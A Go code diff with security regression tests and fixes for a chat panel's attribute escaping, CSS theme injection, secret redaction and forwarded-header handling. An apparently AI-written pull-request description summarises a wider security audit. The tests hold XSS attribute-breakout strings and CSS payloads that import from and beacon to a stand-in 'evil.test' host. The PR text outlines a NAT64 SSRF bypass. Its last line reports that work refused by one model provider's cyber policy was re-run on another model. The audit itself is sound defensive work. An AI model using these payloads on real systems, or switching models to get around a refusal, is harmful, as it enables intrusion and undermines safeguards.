+// gate destructive ops. propose_plan accepts any non-empty unique plan_id
+// (protocol.go ProposePlan), so nothing upstream bounds the value.
+func TestPlanCardAttrBreakoutIsNeutralized(t *testing.T) {
+	hostile := []string{
+		// attribute breakout with a click handler on the Approve button
+		"p' onclick='alert(1)//",
+		// hover-fired variant — no click needed
+		"p' onmouseover='alert(1)//",
+		// focus variant with autofocus chain
+		"p' onfocus='alert(1)' autofocus='1",
+	}
+	for _, planID := range hostile {
+		var b strings.Builder
+		renderPlanCard(&b, &journal.Plan{
+			PlanID:     planID,
+			ProposedAt: time.Now(),
+			Steps:      []string{"step"},
+			Targets:    []journal.PlanTarget{{Op: "delete_entity", Name: "posts"}},
+		}, true)
+		out := b.String()
+		// Check ATTRIBUTE NAMES, not raw substrings. A bare ' or the text
+		// "onclick=" sitting in an element's text content (the plan title
+		// echoes the id verbatim) is inert — only a real attribute is the
+		// vulnerability, and a substring search cannot tell them apart.
+		for _, name := range attrNames(out) {
+			if strings.HasPrefix(name, "on") || name == "autofocus" {
+				t.Errorf("SECURITY: plan_id %q injected attribute %q into plan card:\n%s", planID, name, out)
+			}
+		}
+	}
+	// Happy path: a plan_id with double quotes stays inert, and the
+	// rpc-body attribute remains valid JSON carrying the exact id (the
+	// runtime json-parses this attribute value to dispatch the RPC).
+	var b strings.Builder
+	renderPlanCard(&b, &journal.Plan{PlanID: `p" onclick="alert(1)`, ProposedAt: time.Now()}, true)
+	out := b.String()
+	const marker = `data-fui-rpc-body='`
+	start := strings.Index(out, marker)
+	if start < 0 {
+		t.Fatalf("rpc-body attribute missing:\n%s", out)
+	}
+	rest := out[start+len(marker):]
+	end := strings.Index(rest, `'`)
+	if end < 0 {
+		t.Fatalf("unterminated rpc-body attribute:\n%s", out)
+	}
+	var body struct {
+		PlanID string `json:"plan_id"`
+	}
+	// HTML-unescape first: the browser decodes entity references before the
+	// runtime's JSON.parse ever sees the attribute value, so decoding here
+	// is what models the real consumer. Parsing the raw source text would
+	// fail on correctly-escaped markup.
+	decoded := html.UnescapeString(rest[:end])
+	if err := json.Unmarshal([]byte(decoded), &body); err != nil {
+		t.Errorf("rpc-body is not valid JSON (%v):\n%s", err, decoded)
+	} else if body.PlanID != `p" onclick="alert(1)` {
+		t.Errorf("rpc-body plan_id = %q, want exact round-trip", body.PlanID)
+	}
+}
+
+// attrNames returns every attribute name appearing in an HTML fragment.
+//
+// It is a deliberately small scanner rather than a full parser: it tracks
+// whether it is inside a tag and skips over quoted attribute VALUES, so
+// payload text that is correctly escaped inside a value can never be
+// misread as an attribute name. That skipping is exactly the property
+// under test — if escaping regresses, the injected name becomes visible
+// here.
+func attrNames(doc string) []string {
+	var names []string
+	for i := 0; i < len(doc); i++ {
+		if doc[i] != '<' {
+			continue
+		}
+		i++
+		for i < len(doc) && doc[i] != '>' {
+			switch {
+			case doc[i] == '"' || doc[i] == '\'':
+				q := doc[i]
+				i++
+				for i < len(doc) && doc[i] != q {
+					i++
+				}
+				i++
+			case isAttrNameByte(doc[i]):
+				start := i
+				for i < len(doc) && isAttrNameByte(doc[i]) {
+					i++
+				}
+				if i < len(doc) && doc[i] == '=' {
+					names = append(names, strings.ToLower(doc[start:i]))
+				}
+			default:
+				i++
+			}
+		}
+	}
+	return names
+}
+
+func isAttrNameByte(c byte) bool {
+	return c == '-' || c == '_' || c == ':' ||
+		(c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9')
+}
+
+// Property 2: theme values are agent-authored (set_theme) and land in CSS
+// custom-property declarations that core-ui/style emits unescaped. The
+// /__gofastr/app.css path guards this with kiln/render's safeThemeValue;
+// the /kiln/theme.css path (applyAppOverrides) must not be a bypass.
+func TestThemeCSSRejectsDeclarationBreakout(t *testing.T) {
+	hostile := []string{
+		// close the :root block and pull in attacker CSS
+		"red;} @import url(//evil.test/x.css); :root{--x:0",
+		// exfil beacon as a background fetch
+		"red; background:url(//evil.test/ping)",
+	}
+	for _, v := range hostile {
+		css := pageCSSFor(&world.AppConfig{Theme: map[string]string{"primary": v}})
+		for _, marker := range []string{"@import", "url(//evil.test"} {
+			if strings.Contains(css, marker) {
+				t.Errorf("SECURITY: theme value %q smuggled %q into /kiln/theme.css output:\n%.400s", v, marker, css)
+			}
+		}
+	}
+	// Happy path: a plain color literal still resolves to the override.
+	css := pageCSSFor(&world.AppConfig{Theme: map[string]string{"primary": "#22D3EE"}})
+	if !strings.Contains(css, "#22D3EE") {
+		t.Errorf("legit color override dropped from theme CSS:\n%.400s", css)
+	}
+}
+
+// Property 3: world credentials (App.Auth.JWTSecret, App.Admin.SeedPassword)
+// are masked on every endpoint that emits the world or app config.
+// /kiln/world redacts (redactedWorld); /kiln/status?fields=world|app must
+// not be a bypass.
+func TestStatusDoesNotLeakWorldSecrets(t *testing.T) {
+	d, cleanup, err := db.EphemeralSQLite("kiln-sec")
+	if err != nil {
+		t.Fatal(err)
+	}
+	t.Cleanup(cleanup)
+	factory := func() *framework.App { return framework.NewApp(framework.WithDB(d)) }
+	l, err := live.New(journal.NewMemory(), factory)
+	if err != nil {
+		t.Fatal(err)
+	}
+	tools := protocol.New(l)
+	res := tools.SetAppConfig(context.Background(), protocol.SetAppConfigArgs{
+		Config: world.AppConfig{
+			Name: "sec-test",
+			Auth: world.AuthConfig{Enabled: true, DevMode: true, JWTSecret: "jwt-canary-0123456789"},
+			Admin: world.AdminConfig{
+				Enabled: true, SeedEmail: "root@example.test", SeedPassword: "seed-canary-0123456789", // not-a-secret: canary the assertions grep for, proving the endpoint redacted it
+			},
+		},
+	})
+	if !res.OK {
+		t.Fatalf("SetAppConfig: %+v", res)
+	}
+
+	srv := New(l, tools)
+	for _, fields := range []string{"world", "app", "world,app"} {
+		req := httptest.NewRequest(http.MethodGet, "/kiln/status?fields="+fields, nil)
+		rec := httptest.NewRecorder()
+		srv.serveStatus(rec, req)
+		body := rec.Body.String()
+		for _, canary := range []string{"jwt-canary-0123456789", "seed-canary-0123456789"} {
+			if strings.Contains(body, canary) {
+				t.Errorf("SECURITY: /kiln/status?fields=%s leaked %q:\n%.600s", fields, canary, body)
+			}
+		}
+	}
+
+	// Contrast surface: /kiln/world must stay redacted too (pins the
+	// existing contract the new test defends).
+	req := httptest.NewRequest(http.MethodGet, "/kiln/world", nil)
+	rec := httptest.NewRecorder()
+	srv.serveWorld(rec, req)
+	if strings.Contains(rec.Body.String(), "jwt-canary-0123456789") {
+		t.Errorf("/kiln/world leaked the JWT secret:\n%.600s", rec.Body.String())
+	}
+}
+
+// Property 4: no caller-supplied header chooses the base URL substituted
+// into the fallback host page, and whatever is substituted is HTML-escaped.
+//
+// The base lands inside <code>curl … __KILN_BASE__/kiln/tool/…</code> as
+// raw text. X-Forwarded-* used to select it, which gave a header direct
+// reach into the document; kiln binds loopback and is served directly, so
+// nothing legitimately sets those headers and the trust was unearned. The
+// host now comes from r.Host (pinned by the listener — see
+// rebind_security_test.go) and is escaped on the way out.
+func TestHostBaseIgnoresForwardedHeaders(t *testing.T) {
+	req := httptest.NewRequest(http.MethodGet, "/anything", nil)
+	req.Host = "localhost:8765"
+	req.Header.Set("X-Forwarded-Proto", "https")
+	req.Header.Set("X-Forwarded-Host", "h.example</code><script>alert(1)</script>")
+	html := HostHTMLForRequest(req)
+	if strings.Contains(html, "<script>alert(1)</script>") {
+		t.Errorf("SECURITY: X-Forwarded-Host reached the host page:\n%.600s", html)
+	}
+	if strings.Contains(html, "h.example") {
+		t.Errorf("SECURITY: X-Forwarded-Host still selects the base URL:\n%.600s", html)
+	}
+	// The pinned Host — not the forwarded one — is what renders.
+	if !strings.Contains(html, "http://localhost:8765/kiln/tool/add_entity") {
+		t.Errorf("base URL not built from r.Host:\n%.600s", html)
+	}
+}
+
+// Escaping is asserted independently of the header question: r.Host is
+// pinned, but it is still request-derived text landing in HTML, so the
+// substitution must escape rather than rely on the pin alone.
+func TestHostBaseEscapesHost(t *testing.T) {
+	req := httptest.NewRequest(http.MethodGet, "/anything", nil)
+	req.Host = "h.example</code><script>alert(1)</script>"
+	if html := HostHTMLForRequest(req); strings.Contains(html, "<script>alert(1)</script>") {
+		t.Errorf("SECURITY: Host reflected unescaped into host page:\n%.600s", html)
+	}
+}

--- a/kiln/chat/panel.go
+++ b/kiln/chat/panel.go
@@ -997,17 +997,17 @@ func renderPlanCard(b *strings.Builder, p *journal.Plan, primary bool) {
 				`<button type="button" class="kiln-plan-btn kiln-plan-btn-approve" `+
 				`data-plan-action="approve" data-plan-id="%s" `+
 				`data-fui-rpc="/kiln/panel/approve_plan"  `+
-				`data-fui-rpc-body='{"plan_id":"%s"}'%s>%s</button>`+
+				`data-fui-rpc-body='%s'%s>%s</button>`+
 				`<button type="button" class="kiln-plan-btn kiln-plan-btn-reject" `+
 				`data-plan-action="reject" data-plan-id="%s" `+
 				`data-fui-rpc="/kiln/panel/reject_plan"  `+
-				`data-fui-rpc-body='{"plan_id":"%s"}'%s>%s</button>`+
+				`data-fui-rpc-body='%s'%s>%s</button>`+
 				`<button type="button" class="kiln-plan-btn kiln-plan-btn-modify" `+
 				`data-fui-fill-input=".kiln-input" `+
 				`data-fui-fill-text="Refine plan %s: "%s>%s</button>`+
 				`</div>`,
-			escAttr(p.PlanID), escAttr(p.PlanID), approveExtra, approveLabel,
-			escAttr(p.PlanID), escAttr(p.PlanID), rejectExtra, rejectLabel,
+			escAttr(p.PlanID), attrJSON(map[string]string{"plan_id": p.PlanID}), approveExtra, approveLabel,
+			escAttr(p.PlanID), attrJSON(map[string]string{"plan_id": p.PlanID}), rejectExtra, rejectLabel,
 			escAttr(p.PlanID), modifyExtra, modifyLabel)
 	}
 	b.WriteString(`</li>`)
@@ -1155,9 +1155,33 @@ func escHTML(s string) string {
 	return r.Replace(s)
 }
 
+// escAttr escapes a value for an HTML attribute.
+//
+// The single quote is NOT optional here: this panel emits
+// single-quoted attributes (the data-fui-rpc-body payloads in
+// renderPlanCard), so omitting `'` let a model-chosen plan_id close the
+// attribute and plant a live event handler on the operator's own
+// Approve button — the control that gates destructive world mutations.
+// Escape both quote characters and this function is correct for either
+// delimiter.
 func escAttr(s string) string {
-	r := strings.NewReplacer(`"`, `&quot;`, `&`, `&amp;`, `<`, `&lt;`, `>`, `&gt;`)
+	r := strings.NewReplacer(`&`, `&amp;`, `"`, `&quot;`, `'`, `&#39;`, `<`, `&lt;`, `>`, `&gt;`)
 	return r.Replace(s)
+}
+
+// attrJSON renders v as JSON for embedding in an HTML attribute.
+//
+// Hand-building the JSON and escaping the pieces cannot work: escAttr
+// turns a `"` inside a value into &quot;, which the browser decodes
+// back to a bare quote INSIDE the JSON string, corrupting the document
+// the runtime then parses. Encoding first and escaping the whole
+// result round-trips exactly.
+func attrJSON(v any) string {
+	b, err := json.Marshal(v)
+	if err != nil {
+		return "{}"
+	}
+	return escAttr(string(b))
 }
 
 func itoa(n int) string { return fmt.Sprintf("%d", n) }

--- a/kiln/chat/server.go
+++ b/kiln/chat/server.go
@@ -114,7 +114,7 @@ func HostHTML() string {
 func HostHTMLForRequest(r *http.Request) string {
 	return strings.NewReplacer(
 		`<script src="/__gofastr/runtime.js"></script>`, WidgetTag()+`<script src="/.kiln/reload.js"></script>`,
-		`__KILN_BASE__`, baseFromRequest(r),
+		`__KILN_BASE__`, escHTML(baseFromRequest(r)),
 		`__KILN_LEAD__`, defaultEmptyLead,
 	).Replace(hostHTML)
 }
@@ -131,7 +131,7 @@ func HostHTMLForLive(l *live.Live) func(*http.Request) string {
 		l.ReadSession(func(sess *journal.Session) { lead = leadForWorld(sess.World) })
 		return strings.NewReplacer(
 			`<script src="/__gofastr/runtime.js"></script>`, WidgetTag()+`<script src="/.kiln/reload.js"></script>`,
-			`__KILN_BASE__`, baseFromRequest(r),
+			`__KILN_BASE__`, escHTML(baseFromRequest(r)),
 			`__KILN_LEAD__`, lead,
 		).Replace(hostHTML)
 	}
@@ -162,19 +162,24 @@ func leadForWorld(w *world.World) string {
 	return strings.Join(parts, " · ") + " live. Open the floating panel to keep building, or visit /kiln/world for the IR."
 }
 
+// baseFromRequest builds the absolute base URL echoed into the fallback
+// host page's curl examples.
+//
+// It deliberately does NOT honour X-Forwarded-Proto / X-Forwarded-Host.
+// Kiln binds loopback and is served directly, so nothing legitimately
+// sets those; trusting them only let a caller-supplied header choose the
+// string that gets substituted into the page. r.Host is safe by
+// comparison because the listener pins it (see rebind_security_test.go).
+//
+// The result is still escaped at the substitution site — the value lands
+// in HTML, and this function should not be the only thing standing
+// between a header and the document.
 func baseFromRequest(r *http.Request) string {
 	scheme := "http"
 	if r.TLS != nil {
 		scheme = "https"
 	}
-	if h := r.Header.Get("X-Forwarded-Proto"); h != "" {
-		scheme = h
-	}
-	host := r.Host
-	if h := r.Header.Get("X-Forwarded-Host"); h != "" {
-		host = h
-	}
-	return scheme + "://" + host
+	return scheme + "://" + r.Host
 }
 
 func (s *Server) serveWidgetCSS(w http.ResponseWriter, _ *http.Request) {
@@ -323,17 +328,25 @@ func (s *Server) serveStatus(w http.ResponseWriter, r *http.Request) {
 			out["recent"] = sess.Chat[start:]
 		}
 
-		if want["world"] {
-			out["world"] = sess.World
+		// Both world-shaped fields go through redactedWorld for the same
+		// reason serveWorld does: App.Auth.JWTSecret is a session-forging
+		// key and App.Admin.SeedPassword is a live credential. serveWorld
+		// redacted them and this endpoint did not, so ?fields=world and
+		// ?fields=app handed both out verbatim.
+		if want["world"] || want["app"] {
+			redacted := redactedWorld(sess.World)
+			if want["world"] {
+				out["world"] = redacted
+			}
+			if want["app"] && redacted != nil {
+				out["app"] = redacted.App
+			}
 		}
 		if want["plans"] {
 			out["plans"] = sess.Plans
 		}
 		if want["chat"] {
 			out["chat"] = sess.Chat
-		}
-		if want["app"] {
-			out["app"] = sess.World.App
 		}
 
 		_ = json.NewEncoder(&buf).Encode(out)

--- a/kiln/chat/theme.go
+++ b/kiln/chat/theme.go
@@ -33,6 +33,15 @@ func applyAppOverrides(t *style.Theme, app *world.AppConfig) {
 		return
 	}
 	for k, v := range app.Theme {
+		// Emission-side guard, mirroring the one kiln/render applies on the
+		// /__gofastr/app.css path. This endpoint had none, so a set_theme
+		// value like `red;} @import url(//evil/x.css); :root{--x:0` was
+		// copied straight into the stylesheet. Checked here as well as at
+		// ingestion so a journal already holding a hostile value cannot
+		// render it on replay.
+		if !world.SafeThemeValue(v) {
+			continue
+		}
 		switch k {
 		case "primary":
 			t.Colors.Primary = style.Color{Name: t.Colors.Primary.Name, Value: v}

--- a/kiln/protocol/protocol.go
+++ b/kiln/protocol/protocol.go
@@ -708,6 +708,13 @@ func (t *Tools) SetTheme(_ context.Context, args SetThemeArgs) Result {
 	} else {
 		next.Theme = map[string]string{}
 		for k, v := range args.Theme {
+			// Ingestion-side guard: keep hostile CSS out of the world
+			// entirely rather than relying on every renderer to strip it.
+			// Values reach a `--token: <value>;` declaration unescaped, so
+			// a `;` or `url(...)` here is arbitrary CSS on every page.
+			if !world.SafeThemeValue(v) {
+				return Result{Error: fmt.Sprintf("theme value for %q is not a safe CSS literal", k)}
+			}
 			next.Theme[k] = v
 		}
 	}

--- a/kiln/world/world.go
+++ b/kiln/world/world.go
@@ -1,6 +1,10 @@
 package world
 
-import "github.com/DonaldMurillo/gofastr/core-ui/node"
+import (
+	"strings"
+
+	"github.com/DonaldMurillo/gofastr/core-ui/node"
+)
 
 // The UI node tree (Node, Action, action-kind consts) and its helpers now
 // live in the first-party core-ui/node package so the blueprint codegen
@@ -87,6 +91,39 @@ type AppConfig struct {
 	// dark overrides accept the semantic color keys. Values are CSS literals.
 	Theme     map[string]string `json:"theme,omitempty"`
 	ThemeDark map[string]string `json:"theme_dark,omitempty"`
+}
+
+// SafeThemeValue reports whether v may be emitted as a CSS custom-property
+// value.
+//
+// Theme values are agent-authored (the set_theme tool) and land in a
+// `--color-x: <value>;` declaration that core-ui/style writes out with no
+// escaping of its own. A `;` closes the declaration and `url(...)` fetches
+// off-origin, so an unvalidated value is arbitrary CSS: exfiltration
+// beacons, external @import, and restyling of the plan-approval UI that
+// gates destructive world edits.
+//
+// Allow-list, not block-list: colors, lengths, and font stacks need only
+// alphanumerics and a short punctuation set.
+func SafeThemeValue(v string) bool {
+	if v == "" || len(v) > 128 {
+		return false
+	}
+	for _, r := range v {
+		switch {
+		case r >= 'a' && r <= 'z', r >= 'A' && r <= 'Z', r >= '0' && r <= '9':
+		case strings.ContainsRune(" #%.,-+()/'\"_", r):
+		default:
+			return false
+		}
+	}
+	lower := strings.ToLower(v)
+	for _, bad := range []string{"url(", "image(", "expression(", "/*", "*/", "//"} {
+		if strings.Contains(lower, bad) {
+			return false
+		}
+	}
+	return true
 }
 
 // AuthConfig, AdminConfig, and PWAConfig mirror the corresponding current


### PR DESCRIPTION
Cuts **v0.64.0** and audits the packages that had zero `*_security_test.go`
coverage.

The release rolls everything in `Unreleased`, so it carries #200's two BREAKING
changes (OpenAPI path keys, bound idempotency writes) alongside this branch's
security work. `upgrades.yml` gains a v0.64.0 entry with five migration notes
and `through` moves with it. Tag the merge commit `v0.64.0` to publish — the
release workflow fires on the tag.

Bundling the roll here rather than in a separate `release/v0.64` PR, which is
the repo's usual shape, because `Unreleased` had nothing else pending. Say the
word and I'll split it.

The repo
already had 194 such files; this pass deliberately skipped what they pin and
went at the never-looked list in `.claude/skills/adversarial-tests/SKILL.md`.

Six parallel workers covered six disjoint scopes. I re-verified every finding
myself — ran each proof test, read each defect, and rejected or corrected the
proposed fixes where they were wrong (three of them were; see below).

## Findings

| Fix | What was wrong |
|---|---|
| `netguard` | `IsInternal` normalized only `::ffff:` via `To4()`, so `64:ff9b::a9fe:a9fe` — instance metadata behind NAT64 — read as public and passed both SSRF guards |
| `fanout` | A subscriber callback ran bare on a framework-owned goroutine; one panic killed the process on every replica at once |
| `ratelimit` | Limiter keys were attacker-chosen and unbounded (~1 MiB per login POST), and eviction shed the *oldest* block first, which lifts an attacker's own lockout |
| `urlsafe` | `/\evil.example` passed the guard: it starts with `/`, so it matched the relative-reference check that runs one line after the `//` check |
| `dotenv` | The missing-`=` parse error echoed the whole line, putting a mistyped secret into stderr and every log sink behind it |
| `kiln` | `escAttr` did not escape `'` while the panel emits single-quoted attributes; `/kiln/status` returned `jwt_secret` raw; `set_theme` values reached CSS unvalidated; `X-Forwarded-Host` chose a string substituted into a page |
| `admin` | Stored Image/File values became `src`/`href` without a scheme check — the last two such sinks in the repo |
| `setup` | A wizard step ran while the completion probe was *erroring*, so an unknown state re-ran admin creation |
| `.env` scaffold | `gofastr init` wrote it `0644`, holding `DATABASE_URL` and the documented home of `GOFASTR_SECRET` |

The NAT64 one is the sharpest: a static AAAA record is enough, no rebinding, and
on an IPv6-only subnet with NAT64 the translator forwards to `169.254.169.254`.
Reachable through webhook subscriber registration and harness webfetch.

Kiln's `escAttr` gap is the one to read closely if you only read one: a
model-chosen `plan_id` of `p' onclick='alert(1)//` planted a live handler on the
operator's Approve button, which is the control gating destructive world edits.

## Where I overrode the workers

- **The proposed `netguard` fix was wrong.** It read the RFC 8215 embedding as
  contiguous bytes 6-9. RFC 6052 §2.2 splits the IPv4 across bytes 6-7 and 9-10
  around the reserved `u` octet, so the test vector encoded `0.0.254.254` rather
  than `169.254.169.254` — it would have passed judgement on an address it never
  exercised. Cross-checked against the RFC's own worked example.
- **The proposed eviction fix was wrong.** Reversing the sort sinks unblocked
  entries (zero `blockedUntil`) below active blocks, shedding real lockouts ahead
  of idle state. The order is two-level now.
- **Two tests asserted behavior that should not exist**, so the contract moved
  rather than the fix: kiln's forwarded-header test wanted a benign
  `X-Forwarded-Host` honored, and `battery/setup`'s recovery test depended on the
  step running during an errored probe. Both are called out in their commits.

## Also worth knowing

`battery/print/chromepdf` is a separate module and pinned the vulnerable
`x/image v0.43.0`. Root `govulncheck` structurally cannot see it. #200 fixed it
while this branch was in flight; I verified with `govulncheck ./...` inside that
module.

`framework/ratelimit`'s two bugs came from a worker that died mid-run and left
unexplained failing tests behind. I adjudicated them from the code: the deciding
evidence is `battery/auth/core.go`, where the submitted email becomes the limiter
key with no length bound, deliberately, so account existence cannot be probed.

## Not in this PR

`battery/auth/oauth_token_store.go` seals refresh tokens with AES-GCM and no AAD,
so a ciphertext is not bound to its `(user_id, provider)` row. Adding AAD makes
every stored token undecryptable on next read. That is a persisted-format change
and wants a decision: version-prefixed ciphertext with fallback, or accept a
forced re-auth for OAuth-linked users.

## Negative results

`core-ui` patterns, widget presets, theme, and the runtime JS came back clean —
11 pattern packages and ~50 JS files swept for `innerHTML`/`eval`/`postMessage`
/`fetch` sinks, nothing above Low, 10 candidates refuted. The best candidate died
empirically: `history.pushState` with a `javascript:` URL throws `SecurityError`,
and `_pushURL` wraps it in try/catch.

`framework/access`'s fanout refresh race was on the never-looked list and is
sound — `transitionMu` spans read→mutate, and node IDs are 128-bit crypto/rand.

## Verification

`./scripts/test-all.sh` exits 0 on the final tree. `make vulncheck` is clean.
Every Medium+ finding has a test that was confirmed red against the unfixed code
first — including kiln's, which I re-ran against a reverted `escAttr` to prove
the rewritten assertion still catches the original bug.

Sol refused this work provider-side (`code=cyber_policy`), so both its scopes
were re-run on GLM.

🤖 Generated with [Claude Code](https://claude.com/claude-code)


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Added a command to display backend capabilities.
  * Added release upgrade support through version 0.64.0.

* **Breaking Changes**
  * Updated API-prefixed OpenAPI paths and idempotency handling.
  * Brokered calls now enforce owner scoping.

* **Bug Fixes**
  * Improved protection against unsafe URLs, CSS, SSRF, secret disclosure, and malformed input.
  * Prevented subscriber crashes, setup execution after status errors, and rate-limit abuse.
  * Secured generated environment files and validated email lengths.
  * Improved media rendering, chat sanitization, translated IP detection, and soft-delete authorization guidance.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->